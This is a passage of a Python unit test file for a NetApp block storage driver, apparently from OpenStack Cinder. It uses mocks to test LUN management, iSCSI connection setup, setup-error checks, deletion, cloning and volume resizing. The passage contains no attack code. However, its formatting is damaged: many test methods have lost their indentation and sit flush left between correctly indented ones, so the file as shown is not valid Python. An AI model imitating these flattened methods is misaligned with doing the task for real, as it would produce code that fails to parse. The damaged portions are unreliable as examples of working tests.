        self.assertEqual(1, self.zapi_client.get_lun_by_args.call_count)
        # Only the matching LUN ('lun0') may be extracted.
        self.library._extract_lun_info.assert_called_once_with('lun0')
        self.assertEqual('lun0', lun.name)
    @mock.patch.object(block_base.NetAppBlockStorageLibrary,
                       '_get_existing_vol_with_manage_ref',
                       mock.Mock(return_value=block_base.NetAppLun(
                           'handle', 'name', '1073742824', {})))
    def test_manage_existing_get_size(self):
        """Size is reported in whole GiB, rounded up from the LUN's bytes."""
        size = self.library.manage_existing_get_size(
            {'id': 'vol_id'}, {'ref': 'ref'})
        # 1073742824 bytes is just over 1 GiB, so it reports as 2 GiB.
        self.assertEqual(2, size)
        self.library._get_existing_vol_with_manage_ref.assert_called_once_with(
            {'ref': 'ref'})
    @mock.patch.object(block_base.LOG, 'info')
    def test_unmanage(self, log):
        """Unmanage looks up the LUN and logs it; nothing is deleted."""
        mock_lun = block_base.NetAppLun('handle', 'name', '1',
                                        {'Path': 'p', 'UUID': 'uuid'})
        self.library._get_lun_from_table = mock.Mock(return_value=mock_lun)
        self.library.unmanage({'name': 'vol'})
        self.library._get_lun_from_table.assert_called_once_with('vol')
        self.assertEqual(1, log.call_count)
def test_check_vol_type_for_lun(self):
self.assertRaises(NotImplementedError,
self.library._check_volume_type_for_lun,
'vol', 'lun', 'existing_ref', {})
def test_is_lun_valid_on_storage(self):
self.assertTrue(self.library._is_lun_valid_on_storage('lun'))
    def test_initialize_connection_iscsi(self):
        """A successful iSCSI attach returns full connection properties."""
        target_details_list = fake.ISCSI_TARGET_DETAILS_LIST
        volume = fake.ISCSI_VOLUME
        connector = fake.ISCSI_CONNECTOR
        self.mock_object(block_base.NetAppBlockStorageLibrary, '_map_lun',
                         mock.Mock(return_value=fake.ISCSI_LUN['lun_id']))
        self.zapi_client.get_iscsi_target_details.return_value = (
            target_details_list)
        self.mock_object(block_base.NetAppBlockStorageLibrary,
                         '_get_preferred_target_from_list',
                         mock.Mock(return_value=target_details_list[1]))
        self.zapi_client.get_iscsi_service_details.return_value = (
            fake.ISCSI_SERVICE_IQN)
        self.mock_object(
            na_utils, 'get_iscsi_connection_properties',
            mock.Mock(return_value=fake.ISCSI_CONNECTION_PROPERTIES))
        target_info = self.library.initialize_connection_iscsi(volume,
                                                               connector)
        # CHAP and discovery auth data must pass through unchanged.
        self.assertEqual(
            fake.ISCSI_CONNECTION_PROPERTIES['data']['auth_method'],
            target_info['data']['auth_method'])
        self.assertEqual(
            fake.ISCSI_CONNECTION_PROPERTIES['data']['auth_password'],
            target_info['data']['auth_password'])
        self.assertTrue('auth_password' in target_info['data'])
        self.assertEqual(
            fake.ISCSI_CONNECTION_PROPERTIES['data']['discovery_auth_method'],
            target_info['data']['discovery_auth_method'])
        self.assertEqual(
            fake.ISCSI_CONNECTION_PROPERTIES['data']
            ['discovery_auth_password'],
            target_info['data']['discovery_auth_password'])
        self.assertTrue('auth_password' in target_info['data'])
        self.assertEqual(
            fake.ISCSI_CONNECTION_PROPERTIES['data']
            ['discovery_auth_username'],
            target_info['data']['discovery_auth_username'])
        self.assertEqual(fake.ISCSI_CONNECTION_PROPERTIES, target_info)
        block_base.NetAppBlockStorageLibrary._map_lun.assert_called_once_with(
            fake.ISCSI_VOLUME['name'], [fake.ISCSI_CONNECTOR['initiator']],
            'iscsi', None)
        self.zapi_client.get_iscsi_target_details.assert_called_once_with()
        block_base.NetAppBlockStorageLibrary._get_preferred_target_from_list\
            .assert_called_once_with(
                target_details_list)
        self.zapi_client.get_iscsi_service_details.assert_called_once_with()
    def test_initialize_connection_iscsi_no_target_list(self):
        """Attach fails fast when the backend reports no iSCSI targets."""
        volume = fake.ISCSI_VOLUME
        connector = fake.ISCSI_CONNECTOR
        self.mock_object(block_base.NetAppBlockStorageLibrary, '_map_lun',
                         mock.Mock(return_value=fake.ISCSI_LUN['lun_id']))
        self.zapi_client.get_iscsi_target_details.return_value = None
        self.mock_object(block_base.NetAppBlockStorageLibrary,
                         '_get_preferred_target_from_list')
        self.mock_object(
            na_utils, 'get_iscsi_connection_properties',
            mock.Mock(return_value=fake.ISCSI_CONNECTION_PROPERTIES))
        self.assertRaises(exception.VolumeBackendAPIException,
                          self.library.initialize_connection_iscsi,
                          volume, connector)
        # None of the later steps may run once the target list is empty.
        self.assertEqual(
            0, block_base.NetAppBlockStorageLibrary
            ._get_preferred_target_from_list.call_count)
        self.assertEqual(
            0, self.zapi_client.get_iscsi_service_details.call_count)
        self.assertEqual(
            0, na_utils.get_iscsi_connection_properties.call_count)
def test_initialize_connection_iscsi_no_preferred_target(self):
volume = fake.ISCSI_VOLUME
connector = fake.ISCSI_CONNECTOR
self.mock_object(block_base.NetAppBlockStorageLibrary, '_map_lun',
mock.Mock(return_value=fake.ISCSI_LUN['lun_id']))
self.zapi_client.get_iscsi_target_details.return_value = None
self.mock_object(block_base.NetAppBlockStorageLibrary,
'_get_preferred_target_from_list',
mock.Mock(return_value=None))
self.mock_object(na_utils, 'get_iscsi_connection_properties')
self.assertRaises(exception.VolumeBackendAPIException,
self.library.initialize_connection_iscsi,
volume, connector)
self.assertEqual(0, self.zapi_client
.get_iscsi_service_details.call_count)
self.assertEqual(0, na_utils.get_iscsi_connection_properties
.call_count)
    def test_initialize_connection_iscsi_no_iscsi_service_details(self):
        """Attach fails when the backend has no iSCSI service details."""
        target_details_list = fake.ISCSI_TARGET_DETAILS_LIST
        volume = fake.ISCSI_VOLUME
        connector = fake.ISCSI_CONNECTOR
        self.mock_object(block_base.NetAppBlockStorageLibrary, '_map_lun',
                         mock.Mock(return_value=fake.ISCSI_LUN['lun_id']))
        self.zapi_client.get_iscsi_target_details.return_value = (
            target_details_list)
        self.mock_object(block_base.NetAppBlockStorageLibrary,
                         '_get_preferred_target_from_list',
                         mock.Mock(return_value=target_details_list[1]))
        # The service-details lookup is the step that fails here.
        self.zapi_client.get_iscsi_service_details.return_value = None
        self.mock_object(na_utils, 'get_iscsi_connection_properties')
        self.assertRaises(exception.VolumeBackendAPIException,
                          self.library.initialize_connection_iscsi,
                          volume,
                          connector)
        block_base.NetAppBlockStorageLibrary._map_lun.assert_called_once_with(
            fake.ISCSI_VOLUME['name'], [fake.ISCSI_CONNECTOR['initiator']],
            'iscsi', None)
        self.zapi_client.get_iscsi_target_details.assert_called_once_with()
        block_base.NetAppBlockStorageLibrary._get_preferred_target_from_list\
            .assert_called_once_with(target_details_list)
def test_get_target_details_list(self):
target_details_list = fake.ISCSI_TARGET_DETAILS_LIST
result = self.library._get_preferred_target_from_list(
target_details_list)
self.assertEqual(target_details_list[0], result)
def test_get_preferred_target_from_empty_list(self):
target_details_list = []
result = self.library._get_preferred_target_from_list(
target_details_list)
self.assertIsNone(result)
def test_get_preferred_target_from_list_with_one_interface_disabled(self):
target_details_list = copy.deepcopy(fake.ISCSI_TARGET_DETAILS_LIST)
target_details_list[0]['interface-enabled'] = 'false'
result = self.library._get_preferred_target_from_list(
target_details_list)
self.assertEqual(target_details_list[1], result)
def test_get_preferred_target_from_list_with_all_interfaces_disabled(self):
target_details_list = copy.deepcopy(fake.ISCSI_TARGET_DETAILS_LIST)
for target in target_details_list:
target['interface-enabled'] = 'false'
result = self.library._get_preferred_target_from_list(
target_details_list)
self.assertEqual(target_details_list[0], result)
def test_get_preferred_target_from_list_with_filter(self):
target_details_list = fake.ISCSI_TARGET_DETAILS_LIST
filter = [target_detail['address']
for target_detail in target_details_list[1:]]
result = self.library._get_preferred_target_from_list(
target_details_list, filter)
self.assertEqual(target_details_list[1], result)
    @mock.patch.object(na_utils, 'check_flags', mock.Mock())
    @mock.patch.object(block_base, 'LOG', mock.Mock())
    def test_setup_error_invalid_lun_os(self):
        """An unknown netapp_lun_ostype fails check_for_setup_error."""
        self.library.configuration.netapp_lun_ostype = 'unknown'
        self.library.do_setup(mock.Mock())
        self.assertRaises(exception.NetAppDriverException,
                          self.library.check_for_setup_error)
        msg = _("Invalid value for NetApp configuration"
                " option netapp_lun_ostype.")
        block_base.LOG.error.assert_called_once_with(msg)
    @mock.patch.object(na_utils, 'check_flags', mock.Mock())
    @mock.patch.object(block_base, 'LOG', mock.Mock())
    def test_setup_error_invalid_host_type(self):
        """An unknown netapp_host_type fails check_for_setup_error."""
        self.library.configuration.netapp_lun_ostype = 'linux'
        self.library.configuration.netapp_host_type = 'future_os'
        self.library.do_setup(mock.Mock())
        self.assertRaises(exception.NetAppDriverException,
                          self.library.check_for_setup_error)
        msg = _("Invalid value for NetApp configuration"
                " option netapp_host_type.")
        block_base.LOG.error.assert_called_once_with(msg)
    @mock.patch.object(na_utils, 'check_flags', mock.Mock())
    def test_check_for_setup_error_both_config(self):
        """Valid explicit LUN/host types pass and the LUN table is built."""
        self.library.configuration.netapp_lun_ostype = 'linux'
        self.library.configuration.netapp_host_type = 'linux'
        self.library.do_setup(mock.Mock())
        self.zapi_client.get_lun_list.return_value = ['lun1']
        self.library._extract_and_populate_luns = mock.Mock()
        self.library.check_for_setup_error()
        self.library._extract_and_populate_luns.assert_called_once_with(
            ['lun1'])
    @mock.patch.object(na_utils, 'check_flags', mock.Mock())
    def test_check_for_setup_error_no_os_host(self):
        """Default (unset) LUN/host types also pass the setup check."""
        self.library.configuration.netapp_lun_ostype = None
        self.library.configuration.netapp_host_type = None
        self.library.do_setup(mock.Mock())
        self.zapi_client.get_lun_list.return_value = ['lun1']
        self.library._extract_and_populate_luns = mock.Mock()
        self.library.check_for_setup_error()
        self.library._extract_and_populate_luns.assert_called_once_with(
            ['lun1'])
def test_delete_volume(self):
mock_delete_lun = self.mock_object(self.library, '_delete_lun')
self.library.delete_volume(fake.VOLUME)
mock_delete_lun.assert_called_once_with(fake.LUN_NAME)
    def test_delete_lun(self):
        """Deleting a LUN destroys it on the backend by metadata path."""
        mock_get_lun_attr = self.mock_object(self.library, '_get_lun_attr')
        mock_get_lun_attr.return_value = fake.LUN_METADATA
        self.library.zapi_client = mock.Mock()
        self.library.lun_table = fake.LUN_TABLE
        self.library._delete_lun(fake.LUN_NAME)
        mock_get_lun_attr.assert_called_once_with(
            fake.LUN_NAME, 'metadata')
        self.library.zapi_client.destroy_lun.assert_called_once_with(fake.PATH)
def test_delete_lun_no_metadata(self):
self.mock_object(self.library, '_get_lun_attr', mock.Mock(
return_value=None))
self.library.zapi_client = mock.Mock()
self.mock_object(self.library, 'zapi_client')
self.library._delete_lun(fake.LUN_NAME)
self.library._get_lun_attr.assert_called_once_with(
fake.LUN_NAME, 'metadata')
self.assertEqual(0, self.library.zapi_client.destroy_lun.call_count)
self.assertEqual(0,
self.zapi_client.
mark_qos_policy_group_for_deletion.call_count)
def test_delete_snapshot(self):
mock_delete_lun = self.mock_object(self.library, '_delete_lun')
self.library.delete_snapshot(fake.SNAPSHOT)
mock_delete_lun.assert_called_once_with(fake.SNAPSHOT_NAME)
    def test_clone_source_to_destination(self):
        """A clean clone applies QoS, clones, then extends the new LUN."""
        self.mock_object(na_utils, 'get_volume_extra_specs', mock.Mock(
            return_value=fake.EXTRA_SPECS))
        self.mock_object(self.library, '_setup_qos_for_volume', mock.Mock(
            return_value=fake.QOS_POLICY_GROUP_INFO))
        self.mock_object(self.library, '_clone_lun')
        self.mock_object(self.library, '_extend_volume')
        self.mock_object(self.library, 'delete_volume')
        self.mock_object(self.library, '_mark_qos_policy_group_for_deletion')
        self.library.lun_space_reservation = 'false'
        self.library._clone_source_to_destination(fake.CLONE_SOURCE,
                                                  fake.CLONE_DESTINATION)
        na_utils.get_volume_extra_specs.assert_called_once_with(
            fake.CLONE_DESTINATION)
        self.library._setup_qos_for_volume.assert_called_once_with(
            fake.CLONE_DESTINATION, fake.EXTRA_SPECS)
        self.library._clone_lun.assert_called_once_with(
            fake.CLONE_SOURCE_NAME, fake.CLONE_DESTINATION_NAME,
            space_reserved='false',
            qos_policy_group_name=fake.QOS_POLICY_GROUP_NAME)
        self.library._extend_volume.assert_called_once_with(
            fake.CLONE_DESTINATION, fake.CLONE_DESTINATION_SIZE,
            fake.QOS_POLICY_GROUP_NAME)
        # Success path: no rollback/cleanup may have been triggered.
        self.assertEqual(0, self.library.delete_volume.call_count)
        self.assertEqual(0, self.library.
                         _mark_qos_policy_group_for_deletion.call_count)
    def test_clone_source_to_destination_exception_path(self):
        """A failed extend rolls back: volume deleted, QoS group marked."""
        self.mock_object(na_utils, 'get_volume_extra_specs', mock.Mock(
            return_value=fake.EXTRA_SPECS))
        self.mock_object(self.library, '_setup_qos_for_volume', mock.Mock(
            return_value=fake.QOS_POLICY_GROUP_INFO))
        self.mock_object(self.library, '_clone_lun')
        self.mock_object(self.library, '_extend_volume', mock.Mock(
            side_effect=Exception))
        self.mock_object(self.library, 'delete_volume')
        self.mock_object(self.library, '_mark_qos_policy_group_for_deletion')
        self.library.lun_space_reservation = 'true'
        self.assertRaises(exception.VolumeBackendAPIException,
                          self.library._clone_source_to_destination,
                          fake.CLONE_SOURCE, fake.CLONE_DESTINATION)
        na_utils.get_volume_extra_specs.assert_called_once_with(
            fake.CLONE_DESTINATION)
        self.library._setup_qos_for_volume.assert_called_once_with(
            fake.CLONE_DESTINATION, fake.EXTRA_SPECS)
        self.library._clone_lun.assert_called_once_with(
            fake.CLONE_SOURCE_NAME, fake.CLONE_DESTINATION_NAME,
            space_reserved='true',
            qos_policy_group_name=fake.QOS_POLICY_GROUP_NAME)
        self.library._extend_volume.assert_called_once_with(
            fake.CLONE_DESTINATION, fake.CLONE_DESTINATION_SIZE,
            fake.QOS_POLICY_GROUP_NAME)
        # Failure path: cleanup must run exactly once.
        self.assertEqual(1, self.library.delete_volume.call_count)
        self.assertEqual(1, self.library.
                         _mark_qos_policy_group_for_deletion.call_count)
def test_create_lun(self):
self.assertRaises(NotImplementedError, self.library._create_lun,
fake.VOLUME_ID, fake.LUN_ID, fake.SIZE,
fake.LUN_METADATA)
def test_clone_lun(self):
self.assertRaises(NotImplementedError, self.library._clone_lun,
fake.VOLUME_ID, 'new-' + fake.VOLUME_ID)
def test_create_volume_from_snapshot(self):
mock_do_clone = self.mock_object(self.library,
'_clone_source_to_destination')
source = {
'name': fake.SNAPSHOT['name'],
'size': fake.SNAPSHOT['volume_size']
}
self.library.create_volume_from_snapshot(fake.VOLUME, fake.SNAPSHOT)
mock_do_clone.assert_has_calls([
mock.call(source, fake.VOLUME)])
def test_create_cloned_volume(self):
fake_lun = block_base.NetAppLun(fake.LUN_HANDLE, fake.LUN_ID,
fake.LUN_SIZE, fake.LUN_METADATA)
mock_get_lun_from_table = self.mock_object(self.library,
'_get_lun_from_table')
mock_get_lun_from_table.return_value = fake_lun
mock_do_clone = self.mock_object(self.library,
'_clone_source_to_destination')
source = {
'name': fake_lun.name,
'size': fake.VOLUME_REF['size']
}
self.library.create_cloned_volume(fake.VOLUME, fake.VOLUME_REF)
mock_do_clone.assert_has_calls([
mock.call(source, fake.VOLUME)])
    def test_extend_volume(self):
        """extend_volume re-applies QoS for the new size, then resizes."""
        new_size = 100
        volume_copy = copy.copy(fake.VOLUME)
        volume_copy['size'] = new_size
        mock_get_volume_extra_specs = self.mock_object(
            na_utils, 'get_volume_extra_specs',
            mock.Mock(return_value=fake.EXTRA_SPECS))
        mock_setup_qos_for_volume = self.mock_object(
            self.library, '_setup_qos_for_volume',
            mock.Mock(return_value=fake.QOS_POLICY_GROUP_INFO))
        mock_extend_volume = self.mock_object(self.library, '_extend_volume')
        self.library.extend_volume(fake.VOLUME, new_size)
        mock_get_volume_extra_specs.assert_called_once_with(fake.VOLUME)
        # QoS is set up against a copy of the volume carrying the new size.
        mock_setup_qos_for_volume.assert_called_once_with(volume_copy,
                                                          fake.EXTRA_SPECS)
        mock_extend_volume.assert_called_once_with(fake.VOLUME,
                                                   new_size,
                                                   fake.QOS_POLICY_GROUP_NAME)
    def test_extend_volume_api_error(self):
        """A failed resize restores QoS for the original volume size."""
        new_size = 100
        volume_copy = copy.copy(fake.VOLUME)
        volume_copy['size'] = new_size
        mock_get_volume_extra_specs = self.mock_object(
            na_utils, 'get_volume_extra_specs',
            mock.Mock(return_value=fake.EXTRA_SPECS))
        mock_setup_qos_for_volume = self.mock_object(
            self.library, '_setup_qos_for_volume',
            mock.Mock(return_value=fake.QOS_POLICY_GROUP_INFO))
        mock_extend_volume = self.mock_object(
            self.library, '_extend_volume',
            mock.Mock(side_effect=netapp_api.NaApiError))
        self.assertRaises(netapp_api.NaApiError,
                          self.library.extend_volume,
                          fake.VOLUME,
                          new_size)
        mock_get_volume_extra_specs.assert_called_once_with(fake.VOLUME)
        # QoS setup runs twice: once for the new size, then rolled back
        # to the original volume after the resize failure.
        mock_setup_qos_for_volume.assert_has_calls([
            mock.call(volume_copy, fake.EXTRA_SPECS),
            mock.call(fake.VOLUME, fake.EXTRA_SPECS)])
        mock_extend_volume.assert_called_once_with(
            fake.VOLUME, new_size, fake.QOS_POLICY_GROUP_NAME)
    def test__extend_volume_direct(self):
        """A resize within the max_resize geometry uses do_direct_resize."""
        current_size = fake.LUN_SIZE
        current_size_bytes = current_size * units.Gi
        new_size = fake.LUN_SIZE * 2
        new_size_bytes = new_size * units.Gi
        # Geometry allows growth up to 10x; 2x stays on the direct path.
        max_size = fake.LUN_SIZE * 10
        max_size_bytes = max_size * units.Gi
        fake_volume = copy.copy(fake.VOLUME)
        fake_volume['size'] = new_size
        fake_lun = block_base.NetAppLun(fake.LUN_HANDLE,
                                        fake.LUN_ID,
                                        current_size_bytes,
                                        fake.LUN_METADATA)
        mock_get_lun_from_table = self.mock_object(
            self.library, '_get_lun_from_table',
            mock.Mock(return_value=fake_lun))
        fake_lun_geometry = {'max_resize': six.text_type(max_size_bytes)}
        mock_get_lun_geometry = self.mock_object(
            self.library.zapi_client, 'get_lun_geometry',
            mock.Mock(return_value=fake_lun_geometry))
        mock_do_direct_resize = self.mock_object(self.library.zapi_client,
                                                 'do_direct_resize')
        mock_do_sub_clone_resize = self.mock_object(self.library,
                                                    '_do_sub_clone_resize')
        self.library.lun_table = {fake.VOLUME['name']: fake_lun}
        self.library._extend_volume(fake.VOLUME, new_size, 'fake_qos_policy')
        mock_get_lun_from_table.assert_called_once_with(fake.VOLUME['name'])
        mock_get_lun_geometry.assert_called_once_with(
            fake.LUN_METADATA['Path'])
        mock_do_direct_resize.assert_called_once_with(
            fake.LUN_METADATA['Path'], six.text_type(new_size_bytes))
        self.assertFalse(mock_do_sub_clone_resize.called)
        # The cached LUN table entry must reflect the new size.
        self.assertEqual(six.text_type(new_size_bytes),
                         self.library.lun_table[fake.VOLUME['name']].size)
    def test__extend_volume_clone(self):
        """A resize beyond the max_resize geometry uses the sub-clone path."""
        current_size = fake.LUN_SIZE
        current_size_bytes = current_size * units.Gi
        # 20x exceeds the 10x max_resize limit, forcing a sub-clone resize.
        new_size = fake.LUN_SIZE * 20
        new_size_bytes = new_size * units.Gi
        max_size = fake.LUN_SIZE * 10
        max_size_bytes = max_size * units.Gi
        fake_volume = copy.copy(fake.VOLUME)
        fake_volume['size'] = new_size
        fake_lun = block_base.NetAppLun(fake.LUN_HANDLE,
                                        fake.LUN_ID,
                                        current_size_bytes,
                                        fake.LUN_METADATA)
        mock_get_lun_from_table = self.mock_object(
            self.library, '_get_lun_from_table',
            mock.Mock(return_value=fake_lun))
        fake_lun_geometry = {'max_resize': six.text_type(max_size_bytes)}
        mock_get_lun_geometry = self.mock_object(
            self.library.zapi_client, 'get_lun_geometry',
            mock.Mock(return_value=fake_lun_geometry))
        mock_do_direct_resize = self.mock_object(self.library.zapi_client,
                                                 'do_direct_resize')
        mock_do_sub_clone_resize = self.mock_object(self.library,
                                                    '_do_sub_clone_resize')
        self.library.lun_table = {fake.VOLUME['name']: fake_lun}
        self.library._extend_volume(fake.VOLUME, new_size, 'fake_qos_policy')
        mock_get_lun_from_table.assert_called_once_with(fake.VOLUME['name'])
        mock_get_lun_geometry.assert_called_once_with(
            fake.LUN_METADATA['Path'])
        self.assertFalse(mock_do_direct_resize.called)
        mock_do_sub_clone_resize.assert_called_once_with(
            fake.LUN_METADATA['Path'], six.text_type(new_size_bytes),
            qos_policy_group_name='fake_qos_policy')
        # The cached LUN table entry must reflect the new size.
        self.assertEqual(six.text_type(new_size_bytes),
                         self.library.lun_table[fake.VOLUME['name']].size)
    def test__extend_volume_no_change(self):
        """No resize is attempted when the requested size is unchanged."""
        current_size = fake.LUN_SIZE
        current_size_bytes = current_size * units.Gi
        new_size = fake.LUN_SIZE
        max_size = fake.LUN_SIZE * 10
        max_size_bytes = max_size * units.Gi
        fake_volume = copy.copy(fake.VOLUME)
        fake_volume['size'] = new_size
        fake_lun = block_base.NetAppLun(fake.LUN_HANDLE,
                                        fake.LUN_ID,
                                        current_size_bytes,
                                        fake.LUN_METADATA)
        mock_get_lun_from_table = self.mock_object(
            self.library, '_get_lun_from_table',
            mock.Mock(return_value=fake_lun))
        fake_lun_geometry = {'max_resize': six.text_type(max_size_bytes)}
        mock_get_lun_geometry = self.mock_object(
            self.library.zapi_client, 'get_lun_geometry',
            mock.Mock(return_value=fake_lun_geometry))
        mock_do_direct_resize = self.mock_object(self.library.zapi_client,
                                                 'do_direct_resize')
        mock_do_sub_clone_resize = self.mock_object(self.library,
                                                    '_do_sub_clone_resize')
        self.library.lun_table = {fake_volume['name']: fake_lun}
        self.library._extend_volume(fake_volume, new_size, 'fake_qos_policy')
        mock_get_lun_from_table.assert_called_once_with(fake_volume['name'])
        # Neither resize strategy may be invoked for an unchanged size.
        self.assertFalse(mock_get_lun_geometry.called)
        self.assertFalse(mock_do_direct_resize.called)
        self.assertFalse(mock_do_sub_clone_resize.called)
    def test_do_sub_clone_resize(self):
        """Sub-clone resize creates a bigger LUN and clones blocks into it."""
        fake_lun = block_base.NetAppLun(fake.LUN_HANDLE,
                                        fake.LUN_ID,
                                        fake.LUN_SIZE,
                                        fake.LUN_METADATA)
        new_lun_size = fake.LUN_SIZE * 10
        new_lun_name = 'new-%s' % fake.LUN_NAME
        block_count = fake.LUN_SIZE * units.Gi / 512
        mock_get_lun_from_table = self.mock_object(
            self.library, '_get_lun_from_table',
            mock.Mock(return_value=fake_lun))
        # Compression must be off on the volume for sub-clone to proceed.
        mock_get_vol_option = self.mock_object(
            self.library, '_get_vol_option', mock.Mock(return_value='off'))
        mock_get_lun_block_count = self.mock_object(
            self.library, '_get_lun_block_count',
            mock.Mock(return_value=block_count))
        mock_create_lun = self.mock_object(
            self.library.zapi_client, 'create_lun')
        mock_clone_lun = self.mock_object(self.library, '_clone_lun')
        mock_post_sub_clone_resize = self.mock_object(
            self.library, '_post_sub_clone_resize')
        mock_destroy_lun = self.mock_object(
            self.library.zapi_client, 'destroy_lun')
        self.library._do_sub_clone_resize(fake.LUN_PATH,
                                          new_lun_size,
                                          fake.QOS_POLICY_GROUP_NAME)
        mock_get_lun_from_table.assert_called_once_with(fake.LUN_NAME)
        mock_get_vol_option.assert_called_once_with('vol0', 'compression')
        mock_get_lun_block_count.assert_called_once_with(fake.LUN_PATH)
        mock_create_lun.assert_called_once_with(
            'vol0', new_lun_name, new_lun_size, fake.LUN_METADATA,
            qos_policy_group_name=fake.QOS_POLICY_GROUP_NAME)
        mock_clone_lun.assert_called_once_with(
            fake.LUN_NAME, new_lun_name, block_count=block_count)
        mock_post_sub_clone_resize.assert_called_once_with(fake.LUN_PATH)
        # Success path: the new LUN must not be destroyed.
        self.assertFalse(mock_destroy_lun.called)
    def test_do_sub_clone_resize_compression_on(self):
        """Sub-clone resize is refused when volume compression is enabled."""
        fake_lun = block_base.NetAppLun(fake.LUN_HANDLE,
                                        fake.LUN_ID,
                                        fake.LUN_SIZE,
                                        fake.LUN_METADATA)
        new_lun_size = fake.LUN_SIZE * 10
        block_count = fake.LUN_SIZE * units.Gi / 512
        mock_get_lun_from_table = self.mock_object(
            self.library, '_get_lun_from_table',
            mock.Mock(return_value=fake_lun))
        mock_get_vol_option = self.mock_object(
            self.library, '_get_vol_option', mock.Mock(return_value='on'))
        mock_get_lun_block_count = self.mock_object(
            self.library, '_get_lun_block_count',
            mock.Mock(return_value=block_count))
        mock_create_lun = self.mock_object(
            self.library.zapi_client, 'create_lun')
        mock_clone_lun = self.mock_object(self.library, '_clone_lun')
        mock_post_sub_clone_resize = self.mock_object(
            self.library, '_post_sub_clone_resize')
        mock_destroy_lun = self.mock_object(
            self.library.zapi_client, 'destroy_lun')
        self.assertRaises(exception.VolumeBackendAPIException,
                          self.library._do_sub_clone_resize,
                          fake.LUN_PATH,
                          new_lun_size,
                          fake.QOS_POLICY_GROUP_NAME)
        mock_get_lun_from_table.assert_called_once_with(fake.LUN_NAME)
        mock_get_vol_option.assert_called_once_with('vol0', 'compression')
        # The operation must abort before touching the backend.
        self.assertFalse(mock_get_lun_block_count.called)
        self.assertFalse(mock_create_lun.called)
        self.assertFalse(mock_clone_lun.called)
        self.assertFalse(mock_post_sub_clone_resize.called)
        self.assertFalse(mock_destroy_lun.called)
    def test_do_sub_clone_resize_no_blocks(self):
        """Sub-clone resize must fail when the LUN reports zero blocks."""
        fake_lun = block_base.NetAppLun(fake.LUN_HANDLE,
                                        fake.LUN_ID,
                                        fake.LUN_SIZE,
                                        fake.LUN_METADATA)
        new_lun_size = fake.LUN_SIZE * 10
        # Zero blocks: the geometry query failed or the LUN is unusable.
        block_count = 0
        mock_get_lun_from_table = self.mock_object(
            self.library, '_get_lun_from_table',
            mock.Mock(return_value=fake_lun))
        mock_get_vol_option = self.mock_object(
            self.library, '_get_vol_option', mock.Mock(return_value='off'))
        mock_get_lun_block_count = self.mock_object(
            self.library, '_get_lun_block_count',
            mock.Mock(return_value=block_count))
        mock_create_lun = self.mock_object(
            self.library.zapi_client, 'create_lun')
        mock_clone_lun = self.mock_object(self.library, '_clone_lun')
        mock_post_sub_clone_resize = self.mock_object(
            self.library, '_post_sub_clone_resize')
        mock_destroy_lun = self.mock_object(
            self.library.zapi_client, 'destroy_lun')
        self.assertRaises(exception.VolumeBackendAPIException,
                          self.library._do_sub_clone_resize,
                          fake.LUN_PATH,
                          new_lun_size,
                          fake.QOS_POLICY_GROUP_NAME)
        mock_get_lun_from_table.assert_called_once_with(fake.LUN_NAME)
        mock_get_vol_option.assert_called_once_with('vol0', 'compression')
        mock_get_lun_block_count.assert_called_once_with(fake.LUN_PATH)
        # Nothing past the block-count check may run.
        self.assertFalse(mock_create_lun.called)
        self.assertFalse(mock_clone_lun.called)
        self.assertFalse(mock_post_sub_clone_resize.called)
        self.assertFalse(mock_destroy_lun.called)
    def test_do_sub_clone_resize_create_error(self):
        """A create_lun failure propagates and skips the clone step."""
        fake_lun = block_base.NetAppLun(fake.LUN_HANDLE,
                                        fake.LUN_ID,
                                        fake.LUN_SIZE,
                                        fake.LUN_METADATA)
        new_lun_size = fake.LUN_SIZE * 10
        new_lun_name = 'new-%s' % fake.LUN_NAME
        block_count = fake.LUN_SIZE * units.Gi / 512
        mock_get_lun_from_table = self.mock_object(
            self.library, '_get_lun_from_table',
            mock.Mock(return_value=fake_lun))
        mock_get_vol_option = self.mock_object(
            self.library, '_get_vol_option', mock.Mock(return_value='off'))
        mock_get_lun_block_count = self.mock_object(
            self.library, '_get_lun_block_count',
            mock.Mock(return_value=block_count))
        # The backend rejects the new LUN creation.
        mock_create_lun = self.mock_object(
            self.library.zapi_client, 'create_lun',
            mock.Mock(side_effect=netapp_api.NaApiError))
        mock_clone_lun = self.mock_object(self.library, '_clone_lun')
        mock_post_sub_clone_resize = self.mock_object(
            self.library, '_post_sub_clone_resize')
        mock_destroy_lun = self.mock_object(
            self.library.zapi_client, 'destroy_lun')
        self.assertRaises(netapp_api.NaApiError,
                          self.library._do_sub_clone_resize,
                          fake.LUN_PATH,
                          new_lun_size,
                          fake.QOS_POLICY_GROUP_NAME)
        mock_get_lun_from_table.assert_called_once_with(fake.LUN_NAME)
        mock_get_vol_option.assert_called_once_with('vol0', 'compression')
        mock_get_lun_block_count.assert_called_once_with(fake.LUN_PATH)
        mock_create_lun.assert_called_once_with(
            'vol0', new_lun_name, new_lun_size, fake.LUN_METADATA,
            qos_policy_group_name=fake.QOS_POLICY_GROUP_NAME)
        # No clone was made, so there is nothing to clean up either.
        self.assertFalse(mock_clone_lun.called)
        self.assertFalse(mock_post_sub_clone_resize.called)
        self.assertFalse(mock_destroy_lun.called)
    def test_do_sub_clone_resize_clone_error(self):
        """A clone failure propagates and the new LUN is cleaned up."""
        fake_lun = block_base.NetAppLun(fake.LUN_HANDLE,
                                        fake.LUN_ID,
                                        fake.LUN_SIZE,
                                        fake.LUN_METADATA)
        new_lun_size = fake.LUN_SIZE * 10
        new_lun_name = 'new-%s' % fake.LUN_NAME
        new_lun_path = '/vol/vol0/%s' % new_lun_name
        block_count = fake.LUN_SIZE * units.Gi / 512
        mock_get_lun_from_table = self.mock_object(
            self.library, '_get_lun_from_table',
            mock.Mock(return_value=fake_lun))
        mock_get_vol_option = self.mock_object(
            self.library, '_get_vol_option', mock.Mock(return_value='off'))
        mock_get_lun_block_count = self.mock_object(
            self.library, '_get_lun_block_count',
            mock.Mock(return_value=block_count))
        mock_create_lun = self.mock_object(
            self.library.zapi_client, 'create_lun')
        # The clone step fails after the new LUN already exists.
        mock_clone_lun = self.mock_object(
            self.library, '_clone_lun',
            mock.Mock(side_effect=netapp_api.NaApiError))
        mock_post_sub_clone_resize = self.mock_object(
            self.library, '_post_sub_clone_resize')
        mock_destroy_lun = self.mock_object(
            self.library.zapi_client, 'destroy_lun')
        self.assertRaises(netapp_api.NaApiError,
                          self.library._do_sub_clone_resize,
                          fake.LUN_PATH,
                          new_lun_size,
                          fake.QOS_POLICY_GROUP_NAME)
        mock_get_lun_from_table.assert_called_once_with(fake.LUN_NAME)
        mock_get_vol_option.assert_called_once_with('vol0', 'compression')
